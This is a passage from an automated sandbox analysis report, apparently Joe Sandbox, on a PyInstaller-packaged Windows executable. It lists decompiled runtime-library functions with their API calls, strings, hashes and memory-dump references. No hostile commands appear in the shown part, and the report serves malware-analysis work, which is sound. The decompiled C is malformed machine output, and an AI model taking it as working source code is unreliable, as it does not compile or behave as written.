				 *((intOrPtr*)(_t50 + 0x64)) = r8d;
				E00007FF77FF7DA8F70E0(_t50 + 0x70);
				r15d = 1;
				if (( *(_t50 + 0x70) & 0x0000001f) != 0x1f) goto 0xda8f3187;
				 *((char*)(_t50 + 0x78)) = 0;
				goto 0xda8f3196;
				E00007FF77FF7DA8F7158(( *(_t50 + 0x70) & 0x0000001f) - 0x1f, _t50 + 0x70);
				 *((intOrPtr*)(_t50 + 0x78)) = r15b;
				 *((long long*)(__r9 + 8)) = _t55;
				_t15 = _t46 + 0xd; // 0x2d
				_t22 =  <  ? _t15 : 0x20;
				r8d = 0;
				 *((intOrPtr*)(__r9)) =  <  ? _t15 : 0x20;
				E00007FF77FF7DA8F707C(0, _t33 ^ _t50, _t48 - 0x80);
				if (( *(_t50 + 0x50) >> 0x00000034 & __rdx) != 0) goto 0xda8f31fe;
			}

0x7ff7da8f311c
0x7ff7da8f3127
0x7ff7da8f312f
0x7ff7da8f3136
0x7ff7da8f3140
0x7ff7da8f3147
0x7ff7da8f3151
0x7ff7da8f315d
0x7ff7da8f3161
0x7ff7da8f3165
0x7ff7da8f316a
0x7ff7da8f3173
0x7ff7da8f317e
0x7ff7da8f3180
0x7ff7da8f3185
0x7ff7da8f318c
0x7ff7da8f3191
0x7ff7da8f31a2
0x7ff7da8f31aa
0x7ff7da8f31ad
0x7ff7da8f31b0
0x7ff7da8f31b5
0x7ff7da8f31bd
0x7ff7da8f31db

APIs

fegetenv.LIBCMT ref: 00007FF7DA8F316A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F37D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F394C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F3C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F3E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F4067
memcpy_s.LIBCPMT ref: 00007FF7DA8F4142
memcpy_s.LIBCPMT ref: 00007FF7DA8F41ED
memcpy_s.LIBCPMT ref: 00007FF7DA8F42BC

Strings

1#INF, xrefs: 00007FF7DA8F3293
1#IND, xrefs: 00007FF7DA8F3257
1#SNAN, xrefs: 00007FF7DA8F327A
1#QNAN, xrefs: 00007FF7DA8F3283

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 163807cb9bb2cfd3318ad9cc1b6ca9da72a0ab60671b70bc257b12fde946ee6f
Instruction ID: f0aab24055e079bf9e1fd74ed322384af0d7ff8ff29a826f2e57f86b5b56a68e
Opcode Fuzzy Hash: 163807cb9bb2cfd3318ad9cc1b6ca9da72a0ab60671b70bc257b12fde946ee6f
Instruction Fuzzy Hash: 7CB2E372E182838BF7669E64D4407FDB7A1FB64388FC011B6DE1957A86DB3CA910CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7420 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7447
FormatMessageW.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7476
WideCharToMultiByte.KERNEL32 ref: 00007FF7DA8D74CC

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

Strings

PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF7DA8D74E9
PyInstaller: FormatMessageW failed., xrefs: 00007FF7DA8D7493
FormatMessageW, xrefs: 00007FF7DA8D7487
No error messages generated., xrefs: 00007FF7DA8D7480
WideCharToMultiByte, xrefs: 00007FF7DA8D74DD
Failed to encode wchar_t as UTF-8., xrefs: 00007FF7DA8D74D6

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: bd063840465bb7cc99fd3a25d537acc863a05dd4e60a717c5e3fbe49c0d7532d
Instruction ID: 5a7c27fef208a1a9cff3b26512da5d08b443e15766ce1ddde922e919ffc0e07c
Opcode Fuzzy Hash: bd063840465bb7cc99fd3a25d537acc863a05dd4e60a717c5e3fbe49c0d7532d
Instruction Fuzzy Hash: 91217171A08A4385FB62BF11E84026DEB61BF98384FC40076D94D826A6EF3CD169C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DB5FC Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7DA8DB618
RtlCaptureContext.KERNEL32 ref: 00007FF7DA8DB645
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7DA8DB65F
RtlVirtualUnwind.KERNEL32 ref: 00007FF7DA8DB6A0
IsDebuggerPresent.KERNEL32 ref: 00007FF7DA8DB6F4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8DB715
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8DB720

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: dd2dcb170d6567bc53123a0d73701bc7f87a75e011af16bca6432f566aef9732
Instruction ID: 0650c1f7b5603d4fb26fce2de871b29d64dc747542ea88c3f944cf97d4b79e62
Opcode Fuzzy Hash: dd2dcb170d6567bc53123a0d73701bc7f87a75e011af16bca6432f566aef9732
Instruction Fuzzy Hash: C1315272608B828AFF61AF60E8403EDB364FB94754F84443ADA8E47795DF38D558C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E9A34 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FF77FF7DA8E9A34(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0xda90d008; // 0xde4e6c2f3c2e
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0xda8e9a73;
				E00007FF77FF7DA8DB5F4(_t36);
				r8d = 0x98;
				E00007FF77FF7DA8DC170();
				r8d = 0x4d0;
				E00007FF77FF7DA8DC170();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0xda8e9b06;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0xda8e9b68;
				if (_t38 != 0) goto 0xda8e9b68;
				if (__ecx == 0xffffffff) goto 0xda8e9b68;
				return E00007FF77FF7DA8DACF0(E00007FF77FF7DA8DB5F4(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}

0x7ff7da8e9a34
0x7ff7da8e9a39
0x7ff7da8e9a42
0x7ff7da8e9a4a
0x7ff7da8e9a51
0x7ff7da8e9a5b
0x7ff7da8e9a6c
0x7ff7da8e9a6e
0x7ff7da8e9a7a
0x7ff7da8e9a80
0x7ff7da8e9a8b
0x7ff7da8e9a91
0x7ff7da8e9a9b
0x7ff7da8e9aa4
0x7ff7da8e9aa8
0x7ff7da8e9aad
0x7ff7da8e9ac2
0x7ff7da8e9ac5
0x7ff7da8e9ace
0x7ff7da8e9ad0
0x7ff7da8e9ae3
0x7ff7da8e9af0
0x7ff7da8e9af9
0x7ff7da8e9b00
0x7ff7da8e9b0d
0x7ff7da8e9b1f
0x7ff7da8e9b23
0x7ff7da8e9b31
0x7ff7da8e9b35
0x7ff7da8e9b39
0x7ff7da8e9b43
0x7ff7da8e9b56
0x7ff7da8e9b5a
0x7ff7da8e9b5f
0x7ff7da8e9b8e

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7DA8E9AAD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7DA8E9AC5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7DA8E9B00
IsDebuggerPresent.KERNEL32 ref: 00007FF7DA8E9B39
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8E9B43
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8E9B4E

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d01ddf7f56426acea5c43d672f80e072ef38b87dfc08171ccb6652c2c2b7d2bb
Instruction ID: f892264354e35f347c456d6c076da8cf8f48b20e22286567647a480b81df883c
Opcode Fuzzy Hash: d01ddf7f56426acea5c43d672f80e072ef38b87dfc08171ccb6652c2c2b7d2bb
Instruction Fuzzy Hash: 15317132608B8285EB219B25E8402ADB3A4FB98754F940536EE9D43B96DF3CD555CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F0904 Relevance: 7.8, APIs: 5, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00007FF77FF7DA8F0904(void* __ecx, long long __rbx, intOrPtr* __rcx, void** __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r15;
				signed int _t70;
				void* _t77;
				signed int _t96;
				void* _t109;
				void* _t113;
				signed long long _t140;
				signed long long _t141;
				intOrPtr _t142;
				signed short* _t143;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t154;
				intOrPtr* _t156;
				intOrPtr* _t159;
				long long _t160;
				intOrPtr* _t161;
				signed short* _t167;
				signed short* _t168;
				signed long long _t180;
				signed long long _t182;
				long long _t186;
				signed long long _t202;
				void* _t207;
				intOrPtr* _t211;
				intOrPtr* _t212;
				void* _t214;
				intOrPtr _t220;
				void* _t222;
				void* _t223;
				void* _t225;
				signed long long _t226;
				void* _t228;
				void* _t239;
				signed long long _t240;
				long long _t241;
				void* _t244;
				union _FINDEX_INFO_LEVELS _t249;
				signed short* _t250;
				signed long long _t254;
				intOrPtr* _t255;
				WCHAR* _t258;
				signed long long _t260;

				 *((long long*)(_t225 + 0x18)) = __rbx;
				_t223 = _t225 - 0x1c0;
				_t226 = _t225 - 0x2c0;
				_t140 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t141 = _t140 ^ _t226;
				 *(_t223 + 0x1b8) = _t141;
				r12d = 0;
				 *((long long*)(_t226 + 0x50)) = __rdx;
				if (__rdx != 0) goto 0xda8f095c;
				E00007FF77FF7DA8E4394(_t141);
				_t5 = _t239 + 0x16; // 0x16
				 *_t141 = _t5;
				E00007FF77FF7DA8E9D00();
				goto 0xda8f0cb4;
				asm("xorps xmm0, xmm0");
				 *__rdx = _t239;
				_t142 =  *((intOrPtr*)(__rcx));
				asm("movdqu [esp+0x30], xmm0");
				 *(_t226 + 0x40) = _t239;
				if (_t142 == 0) goto 0xda8f0b8c;
				 *((intOrPtr*)(_t223 + 0x1b0)) = 0x3f002a;
				 *((intOrPtr*)(_t223 + 0x1b4)) = r12w;
				E00007FF77FF7DA8EE550(_t142, _t223 + 0x1b0);
				_t250 =  *((intOrPtr*)(__rcx));
				if (_t142 != 0) goto 0xda8f09e4;
				r8d = 0;
				_t167 = _t250;
				if (E00007FF77FF7DA8F0CF4(0x801, _t167, _t223 + 0x1b0,  *((intOrPtr*)(_t226 + 0x38)), _t228, _t226 + 0x30) != 0) goto 0xda8f0b35;
				goto 0xda8f0b29;
				if (_t142 == _t250) goto 0xda8f0a08;
				_t109 = ( *_t167 & 0x0000ffff) - 0x2f - 0x2d;
				if (_t109 > 0) goto 0xda8f09ff;
				asm("dec eax");
				if (_t109 < 0) goto 0xda8f0a08;
				_t168 = _t167 - 2;
				if (_t168 != _t250) goto 0xda8f09e9;
				_t96 =  *_t168 & 0x0000ffff;
				if (_t96 != 0x3a) goto 0xda8f0a1a;
				_t143 =  &(_t250[1]);
				if (_t168 != _t143) goto 0xda8f0a69;
				_t113 = _t96 - 0x2f - 0x2d;
				if (_t113 > 0) goto 0xda8f0a2f;
				asm("dec eax");
				if (_t113 < 0) goto 0xda8f0a32;
				 *((intOrPtr*)(_t226 + 0x28)) = r12d;
				 *(_t226 + 0x20) = _t239;
				asm("dec ebp");
				r9d = 0;
				FindFirstFileExW(_t258, _t249, _t244);
				if (_t143 != 0xffffffff) goto 0xda8f0a95;
				if (E00007FF77FF7DA8F0CF4(_t143, _t250, _t239,  *((intOrPtr*)(_t226 + 0x38)), _t239, _t226 + 0x30) != 0) goto 0xda8f0b64;
				goto 0xda8f0b29;
				_t240 =  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3;
				if ( *((short*)(_t223 - 0x74)) != 0x2e) goto 0xda8f0abd;
				_t70 =  *(_t223 - 0x72) & 0x0000ffff;
				if (_t70 == 0) goto 0xda8f0adb;
				if (_t70 != 0x2e) goto 0xda8f0abd;
				if ( *((intOrPtr*)(_t223 - 0x70)) == 0) goto 0xda8f0adb;
				if (E00007FF77FF7DA8F0CF4(_t143, _t223 - 0x74, _t250,  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, _t226 + 0x30) != 0) goto 0xda8f0b5b;
				if (FindNextFileW(_t239) != 0) goto 0xda8f0aa1;
				_t220 =  *((intOrPtr*)(_t226 + 0x38));
				_t211 =  *((intOrPtr*)(_t226 + 0x30));
				if (_t240 == _t220 - _t211 >> 3) goto 0xda8f0b1d;
				_t33 =  &(_t143[4]); // 0x8
				r8d = _t33;
				E00007FF77FF7DA8F6710(_t143, _t211 + _t240 * 8, (_t220 - _t211 >> 3) - _t240, _t211, _t220, _t223, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, 0x7ff7da8f08f0, __rcx);
				FindClose(_t207);
				r12d = 0;
				_t260 = __rcx + 8;
				goto 0xda8f097a;
				_t154 = _t211;
				if (_t211 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0c07;
				E00007FF77FF7DA8E9D68( *_t260,  *_t154);
				if (_t154 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0b43;
				goto 0xda8f0c07;
				FindClose(_t214);
				_t212 =  *((intOrPtr*)(_t226 + 0x30));
				_t156 = _t212;
				if (_t212 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0c07;
				_t180 =  *_t156;
				_t77 = E00007FF77FF7DA8E9D68( *_t260, _t180);
				if (_t156 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0b77;
				goto 0xda8f0c07;
				_t202 = _t240;
				 *(_t226 + 0x48) = _t202;
				_t145 = _t212;
				_t254 = (_t220 - _t212 >> 3) + 1;
				if (_t212 == _t220) goto 0xda8f0bce;
				_t182 = (_t180 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *_t145 + _t182 * 2)) != r12w) goto 0xda8f0bb0;
				_t146 = _t145 + 8;
				if (_t146 != _t220) goto 0xda8f0ba9;
				 *(_t226 + 0x48) = _t202 + 1 + _t182;
				r8d = 2;
				E00007FF77FF7DA8E7D5C(_t77, _t254, _t202 + 1 + _t182, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001);
				if (_t146 != 0) goto 0xda8f0c16;
				E00007FF77FF7DA8E9D68(_t146, _t254);
				_t159 = _t212;
				if (_t212 == _t220) goto 0xda8f0c04;
				E00007FF77FF7DA8E9D68(_t146,  *_t159);
				_t160 = _t159 + 8;
				if (_t160 != _t220) goto 0xda8f0bf3;
				E00007FF77FF7DA8E9D68(_t146, _t212);
				goto 0xda8f0cb4;
				_t186 = _t146 + _t254 * 8;
				_t255 = _t212;
				 *((long long*)(_t223 + 0x1b0)) = _t186;
				_t241 = _t186;
				if (_t212 == _t220) goto 0xda8f0c82;
				if ( *((intOrPtr*)( *_t255 + ((_t260 | 0xffffffff) + 1) * 2)) != 0) goto 0xda8f0c3b;
				if (E00007FF77FF7DA8F07F0(_t241 - _t186 >> 1, _t160, _t241,  *(_t226 + 0x48) - (_t241 - _t186 >> 1), _t220,  *_t255, (_t260 | 0xffffffff) + 2, _t222) != 0) goto 0xda8f0cde;
				 *((long long*)(_t255 + _t160 - _t212)) = _t241;
				if (_t255 + 8 != _t220) goto 0xda8f0c32;
				 *((long long*)( *((intOrPtr*)(_t226 + 0x50)))) = _t160;
				E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t226 + 0x50)),  *((intOrPtr*)(_t223 + 0x1b0)));
				_t161 = _t212;
				if (_t212 == _t220) goto 0xda8f0caa;
				E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t226 + 0x50)),  *_t161);
				if (_t161 + 8 != _t220) goto 0xda8f0c99;
				E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t226 + 0x50)), _t212);
				return E00007FF77FF7DA8DACF0(0, 0,  *(_t223 + 0x1b8) ^ _t226);
			}

0x7ff7da8f0904
0x7ff7da8f0914
0x7ff7da8f091c
0x7ff7da8f0923
0x7ff7da8f092a
0x7ff7da8f092d
0x7ff7da8f0934
0x7ff7da8f0937
0x7ff7da8f0942
0x7ff7da8f0944
0x7ff7da8f0949
0x7ff7da8f094e
0x7ff7da8f0950
0x7ff7da8f0957
0x7ff7da8f095c
0x7ff7da8f095f
0x7ff7da8f0962
0x7ff7da8f0965
0x7ff7da8f0975
0x7ff7da8f097d
0x7ff7da8f098a
0x7ff7da8f0997
0x7ff7da8f09a9
0x7ff7da8f09ae
0x7ff7da8f09b7
0x7ff7da8f09be
0x7ff7da8f09c3
0x7ff7da8f09d4
0x7ff7da8f09df
0x7ff7da8f09e7
0x7ff7da8f09f0
0x7ff7da8f09f4
0x7ff7da8f09f9
0x7ff7da8f09fd
0x7ff7da8f09ff
0x7ff7da8f0a06
0x7ff7da8f0a08
0x7ff7da8f0a0f
0x7ff7da8f0a11
0x7ff7da8f0a18
0x7ff7da8f0a1e
0x7ff7da8f0a22
0x7ff7da8f0a27
0x7ff7da8f0a2d
0x7ff7da8f0a35
0x7ff7da8f0a45
0x7ff7da8f0a4c
0x7ff7da8f0a4f
0x7ff7da8f0a5a
0x7ff7da8f0a67
0x7ff7da8f0a80
0x7ff7da8f0a90
0x7ff7da8f0a9c
0x7ff7da8f0aa6
0x7ff7da8f0aa8
0x7ff7da8f0aaf
0x7ff7da8f0ab5
0x7ff7da8f0abb
0x7ff7da8f0ad5
0x7ff7da8f0aeb
0x7ff7da8f0aed
0x7ff7da8f0af2
0x7ff7da8f0b04
0x7ff7da8f0b14
0x7ff7da8f0b14
0x7ff7da8f0b18
0x7ff7da8f0b20
0x7ff7da8f0b26
0x7ff7da8f0b29
0x7ff7da8f0b30
0x7ff7da8f0b35
0x7ff7da8f0b3d
0x7ff7da8f0b46
0x7ff7da8f0b54
0x7ff7da8f0b56
0x7ff7da8f0b5e
0x7ff7da8f0b64
0x7ff7da8f0b69
0x7ff7da8f0b71
0x7ff7da8f0b77
0x7ff7da8f0b7a
0x7ff7da8f0b88
0x7ff7da8f0b8a
0x7ff7da8f0b8f
0x7ff7da8f0b95
0x7ff7da8f0b9e
0x7ff7da8f0ba1
0x7ff7da8f0ba7
0x7ff7da8f0bb0
0x7ff7da8f0bb8
0x7ff7da8f0bbd
0x7ff7da8f0bc7
0x7ff7da8f0bc9
0x7ff7da8f0bce
0x7ff7da8f0bd7
0x7ff7da8f0be2
0x7ff7da8f0be6
0x7ff7da8f0beb
0x7ff7da8f0bf1
0x7ff7da8f0bf6
0x7ff7da8f0bfb
0x7ff7da8f0c02
0x7ff7da8f0c0a
0x7ff7da8f0c11
0x7ff7da8f0c16
0x7ff7da8f0c1a
0x7ff7da8f0c1d
0x7ff7da8f0c24
0x7ff7da8f0c2a
0x7ff7da8f0c43
0x7ff7da8f0c68
0x7ff7da8f0c71
0x7ff7da8f0c80
0x7ff7da8f0c89
0x7ff7da8f0c8c
0x7ff7da8f0c91
0x7ff7da8f0c97
0x7ff7da8f0c9c
0x7ff7da8f0ca8
0x7ff7da8f0cad
0x7ff7da8f0cdd

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F0950
FindFirstFileExW.KERNEL32 ref: 00007FF7DA8F0A5A

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: d25e11c0f83359b7129dee35ad9ddd637a6d65ab07fbb3c505e4348c5bd52168
Instruction ID: 23ec20a17a69d60756a2ee8a346ba36e0ee37697c53d99839a55494ef236c7de
Opcode Fuzzy Hash: d25e11c0f83359b7129dee35ad9ddd637a6d65ab07fbb3c505e4348c5bd52168
Instruction Fuzzy Hash: BBB1D422B186D785FA62AB2194001BDE760FB64BE4FC44173ED5D47B8AEE3CE561C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F2C80 Relevance: 4.8, APIs: 3, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00007FF77FF7DA8F2C80(signed int* __rcx, signed int __rdx, signed int __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
				long long _v64;
				void* _v532;
				intOrPtr _v536;
				signed long long _v544;
				signed int _v552;
				signed long long _v560;
				signed int _v564;
				signed int _v568;
				void* __rbx;
				void* __rsi;
				signed int _t156;
				signed int _t174;
				signed int _t189;
				signed int _t206;
				signed int _t208;
				signed int _t227;
				void* _t244;
				void* _t251;
				signed long long _t256;
				void* _t268;
				signed long long _t269;
				signed int* _t271;
				intOrPtr* _t277;
				signed long long _t280;
				signed long long _t283;
				signed long long _t285;
				signed long long _t287;
				signed long long _t289;
				void* _t290;
				signed int _t293;
				signed long long _t295;
				signed int _t302;
				signed int _t305;
				signed long long _t306;
				void* _t312;
				signed int _t314;
				signed long long _t316;
				void* _t323;
				signed long long _t334;
				long long _t335;

				_t335 = __r13;
				_a16 = __rdx;
				r10d =  *__rcx;
				if (r10d == 0) goto 0xda8f3108;
				if ( *__rdx == 0) goto 0xda8f3108;
				r10d = r10d - 1;
				_t2 = _t290 - 1; // 0x435
				if (_t2 != 0) goto 0xda8f2dbb;
				r12d =  *(__rdx + 4);
				if (r12d != 1) goto 0xda8f2cf2;
				_t271 =  &(__rcx[1]);
				 *__rcx = 0;
				r9d = 0;
				_v536 = 0;
				E00007FF77FF7DA8F43AC(_t251, _t268, _t271, __rdx, __rcx,  &_v532, _t312);
				goto 0xda8f310a;
				if (r10d != 0) goto 0xda8f2d34;
				_t208 = _t271[1];
				 *_t271 = 0;
				r9d = 0;
				_v536 = 0;
				E00007FF77FF7DA8F43AC(_t251, _t268,  &(_t271[1]), __rdx, __rcx,  &_v532, _t312);
				_t189 = _t208 % r12d;
				__rcx[1] = _t189;
				bpl = _t189 != 0;
				 *__rcx = 0;
				goto 0xda8f310a;
				r15d = 0xffffffff;
				if (r10d == r15d) goto 0xda8f2d80;
				r8d =  *(__rcx + 4 + __r10 * 4);
				r10d = r10d + r15d;
				_t174 = _t208 / r12d / _t334;
				_t293 = __rdx;
				if (r10d != r15d) goto 0xda8f2d50;
				r9d = 0;
				_v536 = 0;
				_t302 =  &_v532;
				 *__rcx = 0;
				E00007FF77FF7DA8F43AC( &_v532 | _t295 << 0x00000020, _t268,  &(__rcx[1]), __rdx, __rcx, _t302, _t334);
				__rcx[1] = _t208;
				__rcx[2] = _t174;
				bpl = _t174 != 0;
				 *__rcx = 1;
				goto 0xda8f310a;
				if (1 - r10d > 0) goto 0xda8f3108;
				r8d = r10d;
				_t285 = r10d;
				r8d = r8d - 1;
				r9d = r10d;
				_t269 = r8d;
				if (_t285 - _t269 < 0) goto 0xda8f2e21;
				_t277 = (__rdx >> 0x20) + 4 + _t285 * 4;
				if ( *((intOrPtr*)(__rdx - _t269 * 4 - __rcx + _t277)) !=  *_t277) goto 0xda8f2e0a;
				r9d = r9d - 1;
				if (_t285 - 1 - _t269 >= 0) goto 0xda8f2df1;
				goto 0xda8f2e21;
				_t287 = r9d - r8d;
				_t256 = r9d;
				if ( *((intOrPtr*)(__rdx + 4 + _t287 * 4)) -  *(__rcx + 4 + _t256 * 4) >= 0) goto 0xda8f2e24;
